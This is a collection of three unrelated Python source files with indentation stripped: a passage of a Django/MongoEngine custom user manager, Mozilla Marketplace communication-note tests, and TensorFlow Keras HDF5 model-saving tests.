AUTH_USER_MODEL = 'mongo_auth.MongoUser'
Django will use the model object to access the custom Manager, which will
replace the original queryset with MongoEngine querysets.
By default, django_me.mongo_auth.models.User will be used to store users. You
can specify another document class in MONGOENGINE_USER_DOCUMENT in your
settings.py.
The User Document class has the same requirements as a standard custom user
model: https://docs.djangoproject.com/en/dev/topics/auth/customizing/
In particular, the User Document class must define USERNAME_FIELD and
REQUIRED_FIELDS.
`AUTH_USER_MODEL` has been added in Django 1.5.
"""
def contribute_to_class(self, model, name):
super(MongoUserManager, self).contribute_to_class(model, name)
self.dj_model = self.model
self.model = get_user_document()
self.dj_model.USERNAME_FIELD = self.model.USERNAME_FIELD
username = models.CharField(_('username'), max_length=30, unique=True)
username.contribute_to_class(self.dj_model, self.dj_model.USERNAME_FIELD)
self.dj_model.REQUIRED_FIELDS = self.model.REQUIRED_FIELDS
for name in self.dj_model.REQUIRED_FIELDS:
field = models.CharField(_(name), max_length=30)
field.contribute_to_class(self.dj_model, name)
def get(self, *args, **kwargs):
try:
return self.get_query_set().get(*args, **kwargs)
except self.model.DoesNotExist:
# ModelBackend expects this exception
raise self.dj_model.DoesNotExist
@property
def db(self):
raise NotImplementedError
def get_empty_query_set(self):
return self.model.objects.none()
def get_query_set(self):
return self.model.objects
class MongoUser(models.Model):
""""Dummy user model for Django.
MongoUser is used to replace Django's UserManager with MongoUserManager.
The actual user document class is django_me.auth.User or any
other document class specified in MONGOENGINE_USER_DOCUMENT.
To get the user document class, use `get_user_document()`.
"""
objects = MongoUserManager()
class Meta:
app_label = 'mongo_auth'
def set_password(self, password):
"""Doesn't do anything, but works around the issue with Django 1.6."""
make_password(password)
| |
from django.core.files.uploadedfile import SimpleUploadedFile
import mock
from nose.tools import eq_
from mkt.comm.forms import CommAttachmentFormSet
from mkt.comm.tests.test_views import AttachmentManagementMixin
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.site.tests import TestCase, user_factory
from mkt.site.utils import app_factory, extension_factory
class TestCreateCommNote(TestCase, AttachmentManagementMixin):
def setUp(self):
self.contact = user_factory(email='contact')
self.user = user_factory()
self.grant_permission(self.user, '*:*')
self.app = app_factory(mozilla_contact=self.contact.email)
def test_create_thread(self):
# Default permissions.
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'huehue',
note_type=comm.APPROVAL)
# Check Thread.
eq_(thread.addon, self.app)
eq_(thread.version, self.app.current_version)
expected = {
'public': False, 'developer': True, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
# Check Note.
eq_(note.thread, thread)
eq_(note.author, self.user)
eq_(note.body, 'huehue')
eq_(note.note_type, comm.APPROVAL)
# Check CC.
eq_(thread.thread_cc.count(), 2)
assert thread.thread_cc.filter(user=self.contact).exists()
assert thread.thread_cc.filter(user=self.user).exists()
def test_create_note_existing_thread(self):
# Initial note.
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'huehue')
# Second note from contact.
thread, reply = create_comm_note(
self.app, self.app.current_version, self.contact, 'euheuh!',
note_type=comm.REJECTION)
# Third person joins thread.
thread, last_word = create_comm_note(
self.app, self.app.current_version, user_factory(), 'euheuh!',
note_type=comm.MORE_INFO_REQUIRED)
eq_(thread.thread_cc.count(), 3)
def test_create_note_no_author(self):
thread, note = create_comm_note(
self.app, self.app.current_version, None, 'huehue')
eq_(note.author, None)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_create_note_reviewer_type(self):
for note_type in comm.REVIEWER_NOTE_TYPES:
thread, note = create_comm_note(
self.app, self.app.current_version, None, 'huehue',
note_type=note_type)
eq_(note.read_permission_developer, False)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_custom_perms(self):
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'escalatedquickly',
note_type=comm.ESCALATION, perms={'developer': False,
'staff': True})
expected = {
'public': False, 'developer': False, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_attachments(self):
attach_formdata = self._attachment_management_form(num=2)
attach_formdata.update(self._attachments(num=2))
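        # Django formsets take POST data and a files dict separately; the raw
        # attachment payloads are re-wrapped as SimpleUploadedFile so that
        # validation treats them as uploaded files.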
attach_formset = CommAttachmentFormSet(
attach_formdata,
{'form-0-attachment':
SimpleUploadedFile(
'lol', attach_formdata['form-0-attachment'].read()),
'form-1-attachment':
SimpleUploadedFile(
'lol2', attach_formdata['form-1-attachment'].read())})
thread, note = create_comm_note(
self.app, self.app.current_version, self.user, 'lol',
note_type=comm.APPROVAL, attachments=attach_formset)
eq_(note.attachments.count(), 2)
class TestCreateCommNoteExtensions(TestCase, AttachmentManagementMixin):
def setUp(self):
self.user = user_factory()
self.grant_permission(self.user, '*:*')
self.extension = extension_factory()
def test_create_thread(self):
# Default permissions.
thread, note = create_comm_note(
self.extension, self.extension.latest_version, self.user, 'huehue',
note_type=comm.APPROVAL)
# Check Thread.
eq_(thread.obj, self.extension)
eq_(thread._extension, self.extension)
eq_(thread.version, self.extension.latest_version)
eq_(thread._extension_version, self.extension.latest_version)
expected = {
'public': False, 'developer': True, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
# Check Note.
eq_(note.thread, thread)
eq_(note.author, self.user)
eq_(note.body, 'huehue')
eq_(note.note_type, comm.APPROVAL)
# Check CC.
eq_(thread.thread_cc.count(), 1)
assert thread.thread_cc.filter(user=self.user).exists()
def test_create_note_existing_thread(self):
# Initial note.
thread, note = create_comm_note(
self.extension, self.extension.latest_version, self.user, 'huehue')
# Second person joins thread.
thread, last_word = create_comm_note(
self.extension, self.extension.latest_version, user_factory(),
'euheuh!', note_type=comm.MORE_INFO_REQUIRED)
eq_(thread.thread_cc.count(), 2)
def test_create_note_no_author(self):
thread, note = create_comm_note(
self.extension, self.extension.latest_version, None, 'huehue')
eq_(note.author, None)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_create_note_reviewer_type(self):
for note_type in comm.REVIEWER_NOTE_TYPES:
thread, note = create_comm_note(
self.extension, self.extension.latest_version, None, 'huehue',
note_type=note_type)
eq_(note.read_permission_developer, False)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_custom_perms(self):
thread, note = create_comm_note(
self.extension, self.extension.latest_version, self.user,
'escalatedquickly', note_type=comm.ESCALATION,
perms={'developer': False, 'staff': True})
expected = {
'public': False, 'developer': False, 'reviewer': True,
'senior_reviewer': True, 'mozilla_contact': True, 'staff': True}
for perm, has_perm in expected.items():
eq_(getattr(thread, 'read_permission_%s' % perm), has_perm, perm)
@mock.patch('mkt.comm.utils.post_create_comm_note', new=mock.Mock)
def test_attachments(self):
attach_formdata = self._attachment_management_form(num=2)
attach_formdata.update(self._attachments(num=2))
attach_formset = CommAttachmentFormSet(
attach_formdata,
{'form-0-attachment':
SimpleUploadedFile(
'lol', attach_formdata['form-0-attachment'].read()),
'form-1-attachment':
SimpleUploadedFile(
'lol2', attach_formdata['form-1-attachment'].read())})
thread, note = create_comm_note(
self.extension, self.extension.latest_version, self.user, 'lol',
note_type=comm.APPROVAL, attachments=attach_formset)
eq_(note.attachments.count(), 2)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for model saving in the HDF5 format."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.saving import hdf5_format
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import training as training_module
from tensorflow.python.training.tracking import util as trackable
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
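# h5py is optional here: the tests below that write or read HDF5 files either
# return early or call skipTest when h5py is None.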
class TestWeightSavingAndLoading(test.TestCase, parameterized.TestCase):
@test_util.run_in_graph_and_eager_modes
def test_weight_loading(self):
with self.cached_session():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
model = keras.models.Model(a, b)
x = np.random.random((3, 2))
ref_y = model.predict(x)
weights = model.get_weights()
model.set_weights(weights)
y = model.predict(x)
self.assertAllClose(ref_y, y)
with self.assertRaises(ValueError):
model.set_weights(weights[1:])
with self.assertRaises(ValueError):
model.set_weights(weights[::-1])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
no_extension_path = os.path.join(temp_dir, 'test')
model.save_weights(no_extension_path, save_format='tf')
model.load_weights(no_extension_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
if h5py is None:
return # Skip rest of test if H5py isn't available.
h5_path = os.path.join(temp_dir, 'test.h5')
model.save_weights(h5_path)
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.load_weights(h5_path, by_name=True)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.save_weights(no_extension_path, save_format='hdf5')
model.load_weights(no_extension_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_preprocessing(self):
input_dim = 3
output_dim = 3
size = 2
cases = [
[
(keras.layers.Bidirectional(keras.layers.SimpleRNN(2))),
[np.random.random((2, 1)), np.random.random((2, 1))],
(None, 3, 2),
],
[
(keras.layers.TimeDistributed(keras.layers.Dense(1))),
[np.random.random((2, 1)), np.random.random((1,))],
(None, 3, 2),
],
[
(keras.layers.Conv1D(output_dim, size, use_bias=False)),
[np.random.random((output_dim, input_dim, size, 1))],
(None, 4, input_dim),
],
[
(keras.layers.Conv2D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_last')),
[np.random.random((size, size, input_dim, output_dim))],
(None, 4, 4, input_dim),
],
[
(keras.layers.Conv3D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size, size))],
(None, input_dim, 4, 4, 4),
],
[
(keras.layers.GRU(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
[
(keras.layers.LSTM(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
]
for layer, weights, input_shape in cases:
layer.build(input_shape)
_ = hdf5_format.preprocess_weights_for_loading(
layer, weights, original_keras_version='1')
model = keras.models.Sequential([keras.layers.Dense(2, input_dim=2)])
_ = hdf5_format.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
x = keras.Input((2,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
_ = hdf5_format.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
@parameterized.named_parameters(
('gru', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5)
}),
('gru_with_reset_after', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5),
'reset_after': True
}),
('lstm', keras.layers.LSTM, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnngru', keras.layers.CuDNNGRU, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnnlstm', keras.layers.CuDNNLSTM, {
'units': 2,
'input_shape': (3, 5)
}))
def test_preprocess_weights_for_loading_rnn_should_be_idempotent(
self, layer_class, layer_args):
with self.cached_session():
layer = layer_class(**layer_args)
layer.build(input_shape=layer_args.get('input_shape'))
weights1 = layer.get_weights()
weights2 = hdf5_format.preprocess_weights_for_loading(
layer, weights1)
_ = [
self.assertAllClose(x, y, rtol=1e-05)
for (x, y) in zip(weights1, weights2)
]
@test_util.run_in_graph_and_eager_modes
def test_sequential_weight_loading(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
batch_size = 5
num_classes = 2
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
x = np.random.random((batch_size, input_dim))
ref_y = model.predict(x)
model.save_weights(h5_path)
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(y, ref_y)
@test_util.run_in_graph_and_eager_modes
def test_sequential_weight_loading_group_name_with_incorrect_length(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
num_classes = 2
with self.cached_session():
ref_model = keras.models.Sequential()
ref_model.add(keras.layers.Dense(num_hidden, input_dim=input_dim,
name='d1'))
ref_model.add(keras.layers.Dense(num_classes, name='d2'))
ref_model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
f_ref_model = h5py.File(h5_path, 'w')
hdf5_format.save_weights_to_hdf5_group(f_ref_model, ref_model.layers)
f_model = h5py.File(h5_path, 'r')
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, use_bias=False,
input_dim=input_dim, name='d1'))
model.add(keras.layers.Dense(num_classes, name='d2'))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
with self.assertRaisesRegexp(ValueError,
r'Layer #0 \(named \"d1\"\) expects 1 '
r'weight\(s\), but the saved weights have 2 '
r'element\(s\)\.'):
hdf5_format.load_weights_from_hdf5_group_by_name(f_model, model.layers)
@test_util.run_deprecated_v1
def test_sequential_weight_loading_group_name_with_incorrect_shape(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
num_classes = 2
with self.cached_session():
ref_model = keras.models.Sequential()
ref_model.add(keras.layers.Dense(num_hidden, input_dim=input_dim,
name='d1'))
ref_model.add(keras.layers.Dense(num_classes, name='d2'))
ref_model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
f_ref_model = h5py.File(h5_path, 'w')
hdf5_format.save_weights_to_hdf5_group(f_ref_model, ref_model.layers)
f_model = h5py.File(h5_path, 'r')
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden + 5, input_dim=input_dim,
name='d1'))
model.add(keras.layers.Dense(num_classes, name='d2'))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
with self.assertRaisesRegexp(ValueError,
r'Layer #0 \(named "d1"\), weight '
r'<tf\.Variable \'d1_1\/kernel:0\' '
r'shape=\(3, 10\) dtype=float32> has '
r'shape \(3, 10\), but the saved weight has '
r'shape \(3, 5\)\.'):
hdf5_format.load_weights_from_hdf5_group_by_name(f_model, model.layers)
class TestWholeModelSaving(test.TestCase):
@test_util.run_v1_only('b/120994067')
def test_sequential_model_saving(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalCrossentropy(
name='cce', label_smoothing=constant_op.constant(0.2)),
],
weighted_metrics=[
keras.metrics.categorical_crossentropy,
keras.metrics.CategoricalCrossentropy(
name='cce', label_smoothing=constant_op.constant(0.2)),
],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# test that new updates are the same with both models
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
new_model.train_on_batch(x, y)
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
eval_out = model.evaluate(x, y)
eval_out2 = new_model.evaluate(x, y)
self.assertArrayNear(eval_out, eval_out2, 0.001)
out = model.predict(x)
out2 = new_model.predict(x)
# TODO(b/120930751) This tolerance should be 1e-05,
      # very concerning that it's not.
self.assertAllClose(out, out2, atol=1e-03)
@test_util.run_deprecated_v1
def test_sequential_model_saving_without_input_shape(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
weighted_metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5', dir=self.get_temp_dir())
model.save(fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_without_compile(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
x = np.random.random((1, 3))
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
# Save the model without any compilation or training.
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_sequential_model_saving_2(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
# test with custom optimizer, loss
class CustomOp(keras.optimizers.RMSprop):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss=custom_loss, optimizer=CustomOp(), metrics=['acc'])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(
fname,
custom_objects={'CustomOp': CustomOp,
'custom_loss': custom_loss})
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_functional_model_saving(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
inputs = keras.layers.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
weighted_metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_without_compilation(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_with_tf_optimizer(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse',
optimizer=training_module.AdadeltaOptimizer(0.1),
metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_right_after_compilation(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
model._make_train_function()
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_lambda_numpy_array_arguments(self):
with self.cached_session():
if h5py is None:
self.skipTest('h5py required to run this test')
mean = np.random.random((4, 2, 3))
std = np.abs(np.random.random((4, 2, 3))) + 1e-5
inputs = keras.layers.Input(shape=(4, 2, 3))
output = keras.layers.Lambda(lambda image, mu, std: (image - mu) / std,
arguments={'mu': mean, 'std': std})(inputs)
model = keras.models.Model(inputs, output)
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
self.assertAllClose(mean, model.layers[1].arguments['mu'])
self.assertAllClose(std, model.layers[1].arguments['std'])
def test_saving_model_with_long_layer_names(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
# This layer name will make the `layers_name` HDF5 attribute blow
# out of proportion. Note that it fits into the internal HDF5
# attribute memory limit on its own but because h5py converts
# the list of layer names into numpy array, which uses the same
      # amount of memory for every item, it increases the memory
# requirements substantially.
x = keras.Input(shape=(2,), name='input_' + ('x' * (2**15)))
f = x
for i in range(4):
f = keras.layers.Dense(2, name='dense_%d' % (i,))(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of layer names.
with h5py.File(fname, 'r') as h5file:
num_names_arrays = len([attr for attr in h5file['model_weights'].attrs
if attr.startswith('layer_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_names_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_model_with_long_weights_names(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
x = keras.Input(shape=(2,), name='nested_model_input')
f = x
for i in range(4):
f = keras.layers.Dense(2, name='nested_model_dense_%d' % (i,))(f)
# This layer name will make the `weights_name`
# HDF5 attribute blow out of proportion.
f = keras.layers.Dense(2, name='nested_model_output' + ('x' * (2**14)))(f)
nested_model = keras.Model(inputs=[x], outputs=[f], name='nested_model')
x = keras.Input(shape=(2,), name='outer_model_input')
f = nested_model(x)
f = keras.layers.Dense(2, name='outer_model_output')(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of weight names.
with h5py.File(fname, 'r') as h5file:
num_weight_arrays = len(
[attr for attr in h5file['model_weights']['nested_model'].attrs
if attr.startswith('weight_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_weight_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
@test_util.run_deprecated_v1
def test_model_saving_to_pre_created_h5py_file(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
inputs = keras.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
outputs = keras.layers.Dense(3)(x)
model = keras.Model(inputs, outputs)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.Adam(),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
with h5py.File(fname, mode='r+') as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Test non-default options in h5
with h5py.File('_', driver='core',
backing_store=False) as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_constant_initializer_with_numpy(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
2,
input_shape=(3,),
kernel_initializer=keras.initializers.Constant(np.ones((3, 2)))))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
class SubclassedModel(training.Model):
def __init__(self):
super(SubclassedModel, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.x_layer(a))
class TestWeightSavingAndLoadingTFFormat(test.TestCase):
def test_keras_optimizer_warning(self):
graph = ops.Graph()
with graph.as_default(), self.session(graph):
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer=optimizers.Adam(), metrics=['acc'])
model._make_train_function()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
with test.mock.patch.object(logging, 'warning') as mock_log:
model.save_weights(prefix)
self.assertRegexpMatches(
str(mock_log.call_args),
'Keras optimizer')
@test_util.run_in_graph_and_eager_modes
def test_tensorflow_format_overwrite(self):
with self.cached_session() as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
model(x) # pylint: disable=not-callable
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
model.save_weights(prefix, save_format='tensorflow', overwrite=True)
with self.assertRaises(EOFError):
# Indirectly tests that the user is prompted
model.save_weights(prefix, save_format='tensorflow', overwrite=False)
def test_no_default_session(self):
with ops.Graph().as_default():
self.assertFalse(ops.get_default_session())
data = np.random.random((1000, 32)).astype(np.float32)
labels = np.random.random((1000, 10)).astype(np.float32)
model = keras.models.Sequential([
keras.layers.Dense(10, activation='softmax'),
keras.layers.Dense(10, activation='softmax')])
model.compile(optimizer=training_module.RMSPropOptimizer(0.001),
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels)
fname = os.path.join(self.get_temp_dir(), 'weights', 'ckpt')
model.save_weights(fname)
model.load_weights(fname)
